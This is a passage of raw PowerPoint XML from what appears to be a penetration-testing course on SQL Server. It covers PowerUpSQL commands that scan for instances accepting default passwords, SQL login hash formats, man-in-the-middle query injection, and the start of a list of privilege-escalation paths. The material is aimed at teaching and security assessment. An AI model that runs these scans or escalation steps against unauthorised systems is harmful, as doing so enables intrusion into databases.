              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>considered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB90E783-AD79-4B4F-9043-CCC6A98E3B41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2731373"/>
            <a:ext cx="11041227" cy="379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&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Get-SQLInstanceDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Invoke-SQLAuditDefaultLoginPw</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1867" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C799902D-1C2C-3E46-A150-1A75518F8003}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3299697"/>
            <a:ext cx="11041227" cy="379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&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Get-SQLInstanceDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Get-SQLServerLoginDefaultPw</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1867"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23983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426D-AB94-9441-B698-484C95AABE43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Principals</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC991E8-8411-AA4C-8AB9-63F0FD7CDC86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Principals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>types</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>resources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a SQL Server instance. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Every</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Principal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> has a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Identifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> (SID)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Two</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>types</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>logins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> – Windows and SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Logins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>hashed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>locally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> in master DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL 2012+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1733" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hashBytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1733" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 0x0200 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1733" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fourByteSalt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1733" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | SHA512(utf16EncodedPassword+fourByteSalt)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SQL 2008R2 and Older</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1733" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hashBytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1733" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 0x0100 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1733" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fourByteSalt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1733" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | SHA1(utf16EncodedPassword+fourByteSalt)</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Scope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>principals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>depends</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>definition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Mapped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Logins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Up to SQL 2008R2 local system account has SA rights</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Logins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> instance)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>determine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>permissions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a database)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266878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B176-45A0-A34C-BA14-AA936D742887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1514293" y="513612"/>
            <a:ext cx="9894132" cy="1031216"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Escalating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{640B4361-C0EE-4547-893B-E78B0778219F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1514293" y="2648786"/>
            <a:ext cx="5069383" cy="2636079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Freeform: Shape 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1" name="Freeform: Shape 1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1"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defTabSz="1219170">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DB3ECE9-121A-FF4B-8DDD-0CAD62164013}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7781372" y="2279152"/>
            <a:ext cx="3627064" cy="3387145"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ"/>
              <a:t>While trying to gain initial foothold on SQL server (from all perspectives), we should always check for unencrypted SQL Server communications. If this is the case, via man-in-themiddle attack techniques we can inject our own queries. Based on the victim’s privileges we may be able create (inject) our own SQL login. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422421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50FE-FDBB-4D44-A30D-DEB572D5D7D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Escalating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8FABA72-5D11-C747-B07D-FC62F8902B50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>our</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>way</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> public role </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>leverage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Weak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> &amp; Blind SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Enumeration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Impersonation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
